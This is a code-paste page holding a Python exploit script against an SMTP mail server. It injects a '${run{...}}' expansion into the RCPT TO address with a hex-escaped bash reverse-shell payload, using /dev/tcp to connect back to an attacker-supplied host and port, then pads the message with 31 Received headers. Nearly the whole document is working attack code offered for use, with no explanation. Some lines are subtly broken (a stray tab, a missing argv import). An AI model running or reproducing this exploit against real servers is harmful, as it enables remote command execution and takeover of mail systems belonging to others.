Untitled

mail@pastecode.io avatar
unknown
plain_text
2 months ago
2.3 kB
1
Indexable
Never
class Args(object):
    def __init__(self):
        import argparse
        self.parser = argparse.ArgumentParser()

    def parser_error(self, errmsg):
        print("Usage: python " + argv[0] + " use -h for help")
        exit("Error: {}".format(errmsg))

    def parse_args(self):
        self.parser._optionals.title = "OPTIONS"
        self.parser.add_argument('--rhost', help = "Server Host", required = True)
        self.parser.add_argument('--rport', help = "Server Port", default = 25, type = int)
        self.parser.add_argument('--lhost', help = 'IPv4', required = True)
        self.parser.add_argument('--lport', help = 'Port', type = int, required = True)
        return self.parser.parse_args()

class Exploit(object):
    def __init__(self, rhost, rport, lhost, lport):
        self._rhost = rhost
        self._rport = rport
        self._lhost = lhost
        self._lport = lport
        self._payload = '\\x2Fbin\\x2Fbash\\x20-c\\x20\\x22bash\\x20-i\\x20\\x3E\\x26\\x20\\x2Fdev\\x2Ftcp\\x2F{0}\\x2F{1}\\x200\\x3E\\x261\\x22'.format(lhost.replace('.', '\\x2E'), lport)
        self._run()
        
    def _ehlo(self):
        return 'EHLO {0}\r\n'.format(self._rhost)
    
    def _from(self):
        return 'MAIL FROM:<>\r\n'
    
    def _to(self):
        return 'RCPT TO:<${{run{{{0}}}}}@{1}>\r\n'.format(self._payload, self._rhost)
    
    def _data(self):
        return 'DATA\r\n'

    def _body(self):
        body = ''
        for i in range(1, 32):
            body = body + 'Received: {0}\r\n'.format(i)
        return body + '.\r\n'
    
    def _run(self):
        import socket
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((self._rhost, self._rport))
        sock.recv(1024)
        sock.send(self._ehlo())
        sock.recv(1024)
        sock.send(self._from())
        sock.recv(1024)
        sock.send(self._to())
        sock.recv(1024)
        sock.send(self._data())
        sock.recv(1024)
        sock.send(self._body())
        sock.recv(1024)
	print('[+] Exploited. Check your listener')

if __name__ == '__main__':
    args = Args().parse_args()
    Exploit(rhost = args.rhost, rport = args.rport, lhost = args.lhost, lport = args.lport)
Leave a Comment